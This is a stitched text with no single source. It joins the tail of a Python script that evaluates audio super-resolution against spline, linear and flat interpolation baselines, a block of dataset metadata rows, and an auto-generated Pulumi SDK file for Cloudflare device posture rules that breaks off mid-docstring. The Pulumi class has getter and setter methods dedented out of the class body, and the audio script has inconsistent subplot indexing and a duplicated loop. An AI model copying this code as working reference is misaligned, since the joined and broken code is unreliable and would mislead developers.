        # NOTE(review): the pass below appears to be a near-verbatim
        # copy-paste of the loop above (differences: SLINE vs Spline output
        # name, plt.close(), reformatted EDSR expression). Looks like dead
        # duplication — TODO confirm against the repository and remove.
        # file = '.\\Data\\Test\\p228_045_mic1.flac'
        # wave_dir = "." + os.path.sep + "Data" + os.path.sep + "TEST"
        files = [os.path.join(wave_dir, x) for x in os.listdir(wave_dir)]
        data = []
        for file in files:
            inp = sf.read(file)[0]
            inp_filted = butter_lowpass_filter(inp, 48000 // (2 * 4), 48000).astype('float32')
            inp_filted_hr = inp_filted[::4]
            inp_filted_hr = inp_filted_hr[:len(inp_filted_hr) - (len(inp_filted_hr) % scale)]
            print(len(inp))
            print(len(inp_filted))
            inp_filted_lr = torch.from_numpy(
                butter_lowpass_filter(inp_filted_hr, 12000 // (2 * scale), 12000).astype('float32'))
            inp_filted_lr = inp_filted_lr.clone()[0:len(inp_filted_lr) - (len(inp_filted_lr) % scale):scale]
            pred_data_spline = spline_interpolation(scale, [inp_filted_lr.clone(), 0]).add(1)
            if method == "EDSR":
                pred_data = \
                    model(inp_filted_lr.detach().clone().add(1).unsqueeze(0).unsqueeze(0)).sub(
                        1).cpu().detach().numpy()[0][
                        0]
            else:
                pred_data = model(pred_data_spline.detach().clone().unsqueeze(0)).sub(1).cpu().detach().numpy()[0][0]
            pred_data_spline = pred_data_spline.sub(1).cpu().detach().numpy()[0]
            print(pred_data_spline.shape)
            print(inp_filted_hr.shape)
            # inp_filted_lr = inp_filted_lr.sub(1)
            sf.write(os.path.join(
                '.' + os.sep + 'Data',
                'Predict ' + 'Scale ' + str(scale) + "PRED.flac"), pred_data, 12000)
            sf.write(os.path.join(
                '.' + os.sep + 'Data',
                'Predict ' + 'Scale ' + str(scale) + "HIGH.flac"), inp_filted_hr, 12000)
            sf.write(os.path.join(
                '.' + os.sep + 'Data',
                'Predict ' + 'Scale ' + str(scale) + "LOW.flac"), inp_filted_lr, 12000 // scale)
            sf.write(os.path.join(
                '.' + os.sep + 'Data',
                'Predict ' + 'Scale ' + str(scale) + "SLINE.flac"), pred_data_spline, 12000)
            fig = plt.figure(figsize=(30, 5))
            subplot = fig.add_subplot(scale, 5, 1)
            plt.specgram(inp_filted_lr, Fs=12000 // scale, cmap=newcmp)
            subplot = fig.add_subplot(1, 5, 2)
            plt.specgram(pred_data, Fs=12000, cmap=newcmp, NFFT=256 * scale)
            subplot = fig.add_subplot(1, 5, 3)
            plt.specgram(pred_data_spline, Fs=12000, cmap=newcmp, NFFT=256 * scale)
            subplot = fig.add_subplot(1, 5, 4)
            plt.specgram(inp_filted_hr, Fs=12000, cmap=newcmp, NFFT=256 * scale)
            subplot = fig.add_subplot(1, 5, 5)
            plt.colorbar(label="ok", orientation="vertical")
            plt.show()
            # LSD_list.append(LSD(pred_data, inp_filted_hr))
            # SNR_list.append(SNR(pred_data, inp_filted_hr))
            LSD_list.append(LSD(pred_data, inp_filted_hr))
            SNR_list.append(SNR(pred_data, inp_filted_hr))
            print("Discrepancy with testing results")
            print("ModelLSD: ", LSD(pred_data, inp_filted_hr))
            print("SplineLSD: ", LSD(pred_data_spline, inp_filted_hr))
            print("ModelSNR: ", SNR(pred_data, inp_filted_hr))
            print("SplineSNR: ", SNR(pred_data_spline, inp_filted_hr))
            plt.close()
            # print(max(pred_data), "<->", min(pred_data))
            # print(max(inp_filted_hr), "<->", min(inp_filted_hr))
            # print(max(inp_filted_lr), "<->", min(inp_filted_lr))
            # print(max(pred_data_spline), "<->", min(pred_data_spline))
        print("meanLSD: ", np.mean(LSD_list))
        print("varLSD: ", np.var(LSD_list))
        print("meanSNR: ", np.mean(SNR_list))
        print("varSNR: ", np.var(SNR_list))
if Linear:
    # Baseline (no-ML) path: compare spline (S*), flat (F*) and linear (L*)
    # interpolation against the high-resolution reference.
    SLSD_list = []
    FLSD_list = []
    LLSD_list = []
    SSNR_list = []
    FSNR_list = []
    LSNR_list = []
    # file = '.\\Data\\Test\\p228_045_mic1.flac'
    # wave_dir = "." + os.path.sep + "Data" + os.path.sep + "TEST"
    if single:
        inp = sf.read(file)[0]
        inp_filted = butter_lowpass_filter(inp, 48000 // (2 * 4), 48000).astype('float32')
        inp_filted_hr = inp_filted[::4]
        inp_filted_hr = inp_filted_hr[:len(inp_filted_hr) - (len(inp_filted_hr) % scale)]
        print(len(inp))
        print(len(inp_filted))
        inp_filted_lr = torch.from_numpy(
            butter_lowpass_filter(inp_filted_hr, 12000 // (2 * scale), 12000).astype('float32'))
        inp_filted_lr = inp_filted_lr.clone()[0:len(inp_filted_lr) - (len(inp_filted_lr) % scale):scale]
        # The interpolators work on signals shifted by +1; shift back after.
        pred_data_spline = spline_interpolation(scale, [inp_filted_lr.clone(), 0]).add(1)
        pred_data_spline = pred_data_spline.sub(1).cpu().detach().numpy()[0]
        pred_data_linear = linear_interpolation(scale, [inp_filted_lr.clone(), 0]).add(1)
        pred_data_linear = pred_data_linear.sub(1).cpu().detach().numpy()[0]
        pred_data_flat = flat_interpolation(scale, [inp_filted_lr.clone(), 0]).add(1)
        pred_data_flat = pred_data_flat.sub(1).cpu().detach().numpy()[0]
        print(pred_data_spline.shape)
        print(inp_filted_hr.shape)
        fig = plt.figure(figsize=(30, 5))
        subplot = fig.add_subplot(scale, 5, 1)
        plt.specgram(inp_filted_lr, Fs=12000 // scale, cmap=newcmp, noverlap=int((12000 // scale) * 0.025),
                     NFFT=int(12000 // scale * 0.05))
        subplot = fig.add_subplot(1, 5, 2)
        plt.specgram(pred_data_flat, Fs=12000, cmap=newcmp, noverlap=int((12000) * 0.025), NFFT=int(12000 * 0.05))
        subplot = fig.add_subplot(1, 5, 3)
        plt.specgram(pred_data_linear, Fs=12000, cmap=newcmp, noverlap=int((12000) * 0.025), NFFT=int(12000 * 0.05))
        subplot = fig.add_subplot(1, 5, 4)
        plt.specgram(pred_data_spline, Fs=12000, cmap=newcmp, noverlap=int((12000) * 0.025), NFFT=int(12000 * 0.05))
        subplot = fig.add_subplot(1, 5, 5)
        plt.specgram(inp_filted_hr, Fs=12000, cmap=newcmp, noverlap=int((12000) * 0.025), NFFT=int(12000 * 0.05))
        plt.show()
        sf.write(os.path.join(
            '.' + os.sep + 'Data',
            'Predict ' + 'Scale ' + str(scale) + "Flat.flac"), pred_data_flat, 12000)
        sf.write(os.path.join(
            '.' + os.sep + 'Data',
            'Predict ' + 'Scale ' + str(scale) + "Line.flac"), pred_data_linear, 12000)
        sf.write(os.path.join(
            '.' + os.sep + 'Data',
            'Predict ' + 'Scale ' + str(scale) + "SLINE.flac"), pred_data_spline, 12000)
        # LSD_list.append(LSD(pred_data, inp_filted_hr))
        # SNR_list.append(SNR(pred_data, inp_filted_hr))
        SLSD_list.append(LSD(pred_data_spline, inp_filted_hr))
        SSNR_list.append(SNR(pred_data_spline, inp_filted_hr))
        FLSD_list.append(LSD(pred_data_flat, inp_filted_hr))
        FSNR_list.append(SNR(pred_data_flat, inp_filted_hr))
        LLSD_list.append(LSD(pred_data_linear, inp_filted_hr))
        LSNR_list.append(SNR(pred_data_linear, inp_filted_hr))
    else:
        files = [os.path.join(wave_dir, x) for x in os.listdir(wave_dir)]
        data = []
        for file in files:
            inp = sf.read(file)[0]
            inp_filted = butter_lowpass_filter(inp, 48000 // (2 * 4), 48000).astype('float32')
            inp_filted_hr = inp_filted[::4]
            inp_filted_hr = inp_filted_hr[:len(inp_filted_hr) - (len(inp_filted_hr) % scale)]
            print(len(inp))
            print(len(inp_filted))
            inp_filted_lr = torch.from_numpy(
                butter_lowpass_filter(inp_filted_hr, 12000 // (2 * scale), 12000).astype('float32'))
            inp_filted_lr = inp_filted_lr.clone()[0:len(inp_filted_lr) - (len(inp_filted_lr) % scale):scale]
            pred_data_spline = spline_interpolation(scale, [inp_filted_lr.clone(), 0]).add(1)
            pred_data_spline = pred_data_spline.sub(1).cpu().detach().numpy()[0]
            pred_data_linear = linear_interpolation(scale, [inp_filted_lr.clone(), 0]).add(1)
            pred_data_linear = pred_data_linear.sub(1).cpu().detach().numpy()[0]
            pred_data_flat = flat_interpolation(scale, [inp_filted_lr.clone(), 0]).add(1)
            pred_data_flat = pred_data_flat.sub(1).cpu().detach().numpy()[0]
            print(pred_data_spline.shape)
            print(inp_filted_hr.shape)
            fig = plt.figure(figsize=(30, 5))
            subplot = fig.add_subplot(scale, 5, 1)
            plt.specgram(inp_filted_lr, Fs=12000 // scale, cmap=newcmp, noverlap=int((12000 // scale) * 0.025),
                         NFFT=int(12000 // scale * 0.05))
            subplot = fig.add_subplot(1, 5, 2)
            plt.specgram(pred_data_flat, Fs=12000, cmap=newcmp, noverlap=int((12000) * 0.025), NFFT=int(12000 * 0.05))
            subplot = fig.add_subplot(1, 5, 3)
            plt.specgram(pred_data_linear, Fs=12000, cmap=newcmp, noverlap=int((12000) * 0.025), NFFT=int(12000 * 0.05))
            subplot = fig.add_subplot(1, 5, 4)
            plt.specgram(pred_data_spline, Fs=12000, cmap=newcmp, noverlap=int((12000) * 0.025), NFFT=int(12000 * 0.05))
            subplot = fig.add_subplot(1, 5, 5)
            plt.specgram(inp_filted_hr, Fs=12000, cmap=newcmp, noverlap=int((12000) * 0.025), NFFT=int(12000 * 0.05))
            plt.show()
            sf.write(os.path.join(
                '.' + os.sep + 'Data',
                'Predict ' + 'Scale ' + str(scale) + "Flat.flac"), pred_data_flat, 12000)
            sf.write(os.path.join(
                '.' + os.sep + 'Data',
                'Predict ' + 'Scale ' + str(scale) + "Line.flac"), pred_data_linear, 12000)
            sf.write(os.path.join(
                '.' + os.sep + 'Data',
                'Predict ' + 'Scale ' + str(scale) + "SLINE.flac"), pred_data_spline, 12000)
            # LSD_list.append(LSD(pred_data, inp_filted_hr))
            # SNR_list.append(SNR(pred_data, inp_filted_hr))
            SLSD_list.append(LSD(pred_data_spline, inp_filted_hr))
            SSNR_list.append(SNR(pred_data_spline, inp_filted_hr))
            FLSD_list.append(LSD(pred_data_flat, inp_filted_hr))
            FSNR_list.append(SNR(pred_data_flat, inp_filted_hr))
            LLSD_list.append(LSD(pred_data_linear, inp_filted_hr))
            LSNR_list.append(SNR(pred_data_linear, inp_filted_hr))
    # print(max(pred_data), "<->", min(pred_data))
    # print(max(inp_filted_hr), "<->", min(inp_filted_hr))
    # print(max(inp_filted_lr), "<->", min(inp_filted_lr))
    # print(max(pred_data_spline), "<->", min(pred_data_spline))
    # Summary: mean/variance of LSD and SNR per interpolator (S/F/L).
    print("meanLSDS: ", np.mean(SLSD_list))
    print("varLSDS: ", np.var(SLSD_list))
    print("meanSNRS: ", np.mean(SSNR_list))
    print("varSNRS: ", np.var(SSNR_list))
    print("meanLSDF: ", np.mean(FLSD_list))
    print("varLSDF: ", np.var(FLSD_list))
    print("meanSNRF: ", np.mean(FSNR_list))
    print("varSNRF: ", np.var(FSNR_list))
    print("meanLSDL: ", np.mean(LLSD_list))
    print("varLSDL: ", np.var(LLSD_list))
    print("meanSNRL: ", np.mean(LSNR_list))
    print("varSNRL: ", np.var(LSNR_list))
| 51.58867
| 120
| 0.595369
| 2,845
| 20,945
| 4.147627
| 0.081898
| 0.122034
| 0.081102
| 0.042373
| 0.837712
| 0.823305
| 0.821695
| 0.815339
| 0.813136
| 0.813136
| 0
| 0.04915
| 0.250084
| 20,945
| 405
| 121
| 51.716049
| 0.702107
| 0.092671
| 0
| 0.746951
| 0
| 0
| 0.074781
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.033537
| 0.039634
| 0
| 0.039634
| 0.164634
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9bbeac278917af1dcc4820889b45dbddec766da7
| 22,000
|
py
|
Python
|
sdk/python/pulumi_cloudflare/device_posture_rule.py
|
pulumi/pulumi-cloudflare
|
d444af2fab6101b388a15cf2e3933e45e9935cc6
|
[
"ECL-2.0",
"Apache-2.0"
] | 35
|
2019-03-14T21:29:29.000Z
|
2022-03-30T00:00:59.000Z
|
sdk/python/pulumi_cloudflare/device_posture_rule.py
|
pulumi/pulumi-cloudflare
|
d444af2fab6101b388a15cf2e3933e45e9935cc6
|
[
"ECL-2.0",
"Apache-2.0"
] | 128
|
2019-03-08T23:45:58.000Z
|
2022-03-31T21:05:22.000Z
|
sdk/python/pulumi_cloudflare/device_posture_rule.py
|
pulumi/pulumi-cloudflare
|
d444af2fab6101b388a15cf2e3933e45e9935cc6
|
[
"ECL-2.0",
"Apache-2.0"
] | 6
|
2019-05-10T12:52:56.000Z
|
2020-03-24T15:02:14.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['DevicePostureRuleArgs', 'DevicePostureRule']
@pulumi.input_type
class DevicePostureRuleArgs:
def __init__(__self__, *,
account_id: pulumi.Input[str],
type: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
inputs: Optional[pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleInputArgs']]]] = None,
matches: Optional[pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleMatchArgs']]]] = None,
name: Optional[pulumi.Input[str]] = None,
schedule: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a DevicePostureRule resource.
:param pulumi.Input[str] account_id: The account to which the device posture rule should be added.
:param pulumi.Input[str] type: The device posture rule type. Valid values are `file`, `application`, and `serial_number`.
:param pulumi.Input[str] description: The description of the device posture rule.
:param pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleInputArgs']]] inputs: The value to be checked against. See below for reference
structure.
:param pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleMatchArgs']]] matches: The conditions that the client must match to run the rule. See below for reference structure.
:param pulumi.Input[str] name: Name of the device posture rule.
:param pulumi.Input[str] schedule: Tells the client when to run the device posture check.
Must be in the format `"1h"` or `"30m"`. Valid units are `h` and `m`.
"""
pulumi.set(__self__, "account_id", account_id)
pulumi.set(__self__, "type", type)
if description is not None:
pulumi.set(__self__, "description", description)
if inputs is not None:
pulumi.set(__self__, "inputs", inputs)
if matches is not None:
pulumi.set(__self__, "matches", matches)
if name is not None:
pulumi.set(__self__, "name", name)
if schedule is not None:
pulumi.set(__self__, "schedule", schedule)
@property
@pulumi.getter(name="accountId")
def account_id(self) -> pulumi.Input[str]:
"""
The account to which the device posture rule should be added.
"""
return pulumi.get(self, "account_id")
@account_id.setter
def account_id(self, value: pulumi.Input[str]):
pulumi.set(self, "account_id", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
    """
    The device posture rule type. Valid values are `file`, `application`, and `serial_number`.
    """
    return pulumi.get(self, "type")

@type.setter
def type(self, value: pulumi.Input[str]):
    """Set the rule type (required property)."""
    pulumi.set(self, "type", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
    """
    The description of the device posture rule.
    """
    return pulumi.get(self, "description")

@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
    """Set the optional rule description."""
    pulumi.set(self, "description", value)
@property
@pulumi.getter
def inputs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleInputArgs']]]]:
    """
    The value to be checked against. See below for reference
    structure.
    """
    return pulumi.get(self, "inputs")

@inputs.setter
def inputs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleInputArgs']]]]):
    """Set the optional list of input checks."""
    pulumi.set(self, "inputs", value)
@property
@pulumi.getter
def matches(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleMatchArgs']]]]:
    """
    The conditions that the client must match to run the rule. See below for reference structure.
    """
    return pulumi.get(self, "matches")

@matches.setter
def matches(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleMatchArgs']]]]):
    """Set the optional list of match conditions."""
    pulumi.set(self, "matches", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
    """
    Name of the device posture rule.
    """
    return pulumi.get(self, "name")

@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
    """Set the optional rule name."""
    pulumi.set(self, "name", value)
@property
@pulumi.getter
def schedule(self) -> Optional[pulumi.Input[str]]:
    """
    Tells the client when to run the device posture check.
    Must be in the format `"1h"` or `"30m"`. Valid units are `h` and `m`.
    """
    return pulumi.get(self, "schedule")

@schedule.setter
def schedule(self, value: Optional[pulumi.Input[str]]):
    """Set the optional check schedule (e.g. `"1h"`, `"30m"`)."""
    pulumi.set(self, "schedule", value)
@pulumi.input_type
class _DevicePostureRuleState:
    # NOTE: auto-generated Pulumi input type used for state lookups
    # (DevicePostureRule.get); every field is optional because a lookup
    # may supply only a subset of the resource's properties.
    def __init__(__self__, *,
                 account_id: Optional[pulumi.Input[str]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 inputs: Optional[pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleInputArgs']]]] = None,
                 matches: Optional[pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleMatchArgs']]]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 schedule: Optional[pulumi.Input[str]] = None,
                 type: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering DevicePostureRule resources.
        :param pulumi.Input[str] account_id: The account to which the device posture rule should be added.
        :param pulumi.Input[str] description: The description of the device posture rule.
        :param pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleInputArgs']]] inputs: The value to be checked against. See below for reference
               structure.
        :param pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleMatchArgs']]] matches: The conditions that the client must match to run the rule. See below for reference structure.
        :param pulumi.Input[str] name: Name of the device posture rule.
        :param pulumi.Input[str] schedule: Tells the client when to run the device posture check.
               Must be in the format `"1h"` or `"30m"`. Valid units are `h` and `m`.
        :param pulumi.Input[str] type: The device posture rule type. Valid values are `file`, `application`, and `serial_number`.
        """
        # Only record values that were actually supplied so that unset fields
        # stay absent from the state rather than being stored as None.
        if account_id is not None:
            pulumi.set(__self__, "account_id", account_id)
        if description is not None:
            pulumi.set(__self__, "description", description)
        if inputs is not None:
            pulumi.set(__self__, "inputs", inputs)
        if matches is not None:
            pulumi.set(__self__, "matches", matches)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if schedule is not None:
            pulumi.set(__self__, "schedule", schedule)
        if type is not None:
            pulumi.set(__self__, "type", type)

    @property
    @pulumi.getter(name="accountId")
    def account_id(self) -> Optional[pulumi.Input[str]]:
        """
        The account to which the device posture rule should be added.
        """
        return pulumi.get(self, "account_id")

    @account_id.setter
    def account_id(self, value: Optional[pulumi.Input[str]]):
        """Set the optional account ID."""
        pulumi.set(self, "account_id", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        The description of the device posture rule.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        """Set the optional rule description."""
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter
    def inputs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleInputArgs']]]]:
        """
        The value to be checked against. See below for reference
        structure.
        """
        return pulumi.get(self, "inputs")

    @inputs.setter
    def inputs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleInputArgs']]]]):
        """Set the optional list of input checks."""
        pulumi.set(self, "inputs", value)

    @property
    @pulumi.getter
    def matches(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleMatchArgs']]]]:
        """
        The conditions that the client must match to run the rule. See below for reference structure.
        """
        return pulumi.get(self, "matches")

    @matches.setter
    def matches(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['DevicePostureRuleMatchArgs']]]]):
        """Set the optional list of match conditions."""
        pulumi.set(self, "matches", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the device posture rule.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        """Set the optional rule name."""
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def schedule(self) -> Optional[pulumi.Input[str]]:
        """
        Tells the client when to run the device posture check.
        Must be in the format `"1h"` or `"30m"`. Valid units are `h` and `m`.
        """
        return pulumi.get(self, "schedule")

    @schedule.setter
    def schedule(self, value: Optional[pulumi.Input[str]]):
        """Set the optional check schedule (e.g. `"1h"`, `"30m"`)."""
        pulumi.set(self, "schedule", value)

    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        """
        The device posture rule type. Valid values are `file`, `application`, and `serial_number`.
        """
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        """Set the optional rule type."""
        pulumi.set(self, "type", value)
class DevicePostureRule(pulumi.CustomResource):
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 account_id: Optional[pulumi.Input[str]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 inputs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DevicePostureRuleInputArgs']]]]] = None,
                 matches: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DevicePostureRuleMatchArgs']]]]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 schedule: Optional[pulumi.Input[str]] = None,
                 type: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Provides a Cloudflare Device Posture Rule resource. Device posture rules configure security policies for device posture checks.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_cloudflare as cloudflare

        corporate_devices_posture_rule = cloudflare.DevicePostureRule("corporateDevicesPostureRule",
            account_id="1d5fdc9e88c8a8c4518b068cd94331fe",
            name="Corporate devices posture rule",
            type="serial_number",
            description="Device posture rule for corporate devices.",
            schedule="24h",
            matches=[cloudflare.DevicePostureRuleMatchArgs(
                platform="mac",
            )],
            inputs=[cloudflare.DevicePostureRuleInputArgs(
                id=cloudflare_teams_list["corporate_devices"]["id"],
            )])
        ```

        ## Import

        Device posture rules can be imported using a composite ID formed of account ID and device posture rule ID.

        ```sh
        $ pulumi import cloudflare:index/devicePostureRule:DevicePostureRule corporate_devices cb029e245cfdd66dc8d2e570d5dd3322/d41d8cd98f00b204e9800998ecf8427e
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] account_id: The account to which the device posture rule should be added.
        :param pulumi.Input[str] description: The description of the device posture rule.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DevicePostureRuleInputArgs']]]] inputs: The value to be checked against. See below for reference
               structure.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DevicePostureRuleMatchArgs']]]] matches: The conditions that the client must match to run the rule. See below for reference structure.
        :param pulumi.Input[str] name: Name of the device posture rule.
        :param pulumi.Input[str] schedule: Tells the client when to run the device posture check.
               Must be in the format `"1h"` or `"30m"`. Valid units are `h` and `m`.
        :param pulumi.Input[str] type: The device posture rule type. Valid values are `file`, `application`, and `serial_number`.
        """
        ...

    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: DevicePostureRuleArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Provides a Cloudflare Device Posture Rule resource. Device posture rules configure security policies for device posture checks.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_cloudflare as cloudflare

        corporate_devices_posture_rule = cloudflare.DevicePostureRule("corporateDevicesPostureRule",
            account_id="1d5fdc9e88c8a8c4518b068cd94331fe",
            name="Corporate devices posture rule",
            type="serial_number",
            description="Device posture rule for corporate devices.",
            schedule="24h",
            matches=[cloudflare.DevicePostureRuleMatchArgs(
                platform="mac",
            )],
            inputs=[cloudflare.DevicePostureRuleInputArgs(
                id=cloudflare_teams_list["corporate_devices"]["id"],
            )])
        ```

        ## Import

        Device posture rules can be imported using a composite ID formed of account ID and device posture rule ID.

        ```sh
        $ pulumi import cloudflare:index/devicePostureRule:DevicePostureRule corporate_devices cb029e245cfdd66dc8d2e570d5dd3322/d41d8cd98f00b204e9800998ecf8427e
        ```

        :param str resource_name: The name of the resource.
        :param DevicePostureRuleArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...

    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the two overloads above: either a single
        # DevicePostureRuleArgs bundle or individual keyword arguments.
        resource_args, opts = _utilities.get_resource_args_opts(DevicePostureRuleArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       account_id: Optional[pulumi.Input[str]] = None,
                       description: Optional[pulumi.Input[str]] = None,
                       inputs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DevicePostureRuleInputArgs']]]]] = None,
                       matches: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DevicePostureRuleMatchArgs']]]]] = None,
                       name: Optional[pulumi.Input[str]] = None,
                       schedule: Optional[pulumi.Input[str]] = None,
                       type: Optional[pulumi.Input[str]] = None,
                       __props__=None):
        # Shared implementation behind both __init__ overloads.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        # opts.id is set only when rehydrating an existing resource via
        # __props__; for a fresh resource we build the props bag here and
        # enforce the required properties (account_id, type).
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = DevicePostureRuleArgs.__new__(DevicePostureRuleArgs)

            if account_id is None and not opts.urn:
                raise TypeError("Missing required property 'account_id'")
            __props__.__dict__["account_id"] = account_id
            __props__.__dict__["description"] = description
            __props__.__dict__["inputs"] = inputs
            __props__.__dict__["matches"] = matches
            __props__.__dict__["name"] = name
            __props__.__dict__["schedule"] = schedule
            if type is None and not opts.urn:
                raise TypeError("Missing required property 'type'")
            __props__.__dict__["type"] = type
        super(DevicePostureRule, __self__).__init__(
            'cloudflare:index/devicePostureRule:DevicePostureRule',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            account_id: Optional[pulumi.Input[str]] = None,
            description: Optional[pulumi.Input[str]] = None,
            inputs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DevicePostureRuleInputArgs']]]]] = None,
            matches: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DevicePostureRuleMatchArgs']]]]] = None,
            name: Optional[pulumi.Input[str]] = None,
            schedule: Optional[pulumi.Input[str]] = None,
            type: Optional[pulumi.Input[str]] = None) -> 'DevicePostureRule':
        """
        Get an existing DevicePostureRule resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] account_id: The account to which the device posture rule should be added.
        :param pulumi.Input[str] description: The description of the device posture rule.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DevicePostureRuleInputArgs']]]] inputs: The value to be checked against. See below for reference
               structure.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DevicePostureRuleMatchArgs']]]] matches: The conditions that the client must match to run the rule. See below for reference structure.
        :param pulumi.Input[str] name: Name of the device posture rule.
        :param pulumi.Input[str] schedule: Tells the client when to run the device posture check.
               Must be in the format `"1h"` or `"30m"`. Valid units are `h` and `m`.
        :param pulumi.Input[str] type: The device posture rule type. Valid values are `file`, `application`, and `serial_number`.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _DevicePostureRuleState.__new__(_DevicePostureRuleState)

        __props__.__dict__["account_id"] = account_id
        __props__.__dict__["description"] = description
        __props__.__dict__["inputs"] = inputs
        __props__.__dict__["matches"] = matches
        __props__.__dict__["name"] = name
        __props__.__dict__["schedule"] = schedule
        __props__.__dict__["type"] = type
        return DevicePostureRule(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter(name="accountId")
    def account_id(self) -> pulumi.Output[str]:
        """
        The account to which the device posture rule should be added.
        """
        return pulumi.get(self, "account_id")

    @property
    @pulumi.getter
    def description(self) -> pulumi.Output[Optional[str]]:
        """
        The description of the device posture rule.
        """
        return pulumi.get(self, "description")

    @property
    @pulumi.getter
    def inputs(self) -> pulumi.Output[Sequence['outputs.DevicePostureRuleInput']]:
        """
        The value to be checked against. See below for reference
        structure.
        """
        return pulumi.get(self, "inputs")

    @property
    @pulumi.getter
    def matches(self) -> pulumi.Output[Optional[Sequence['outputs.DevicePostureRuleMatch']]]:
        """
        The conditions that the client must match to run the rule. See below for reference structure.
        """
        return pulumi.get(self, "matches")

    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[Optional[str]]:
        """
        Name of the device posture rule.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def schedule(self) -> pulumi.Output[Optional[str]]:
        """
        Tells the client when to run the device posture check.
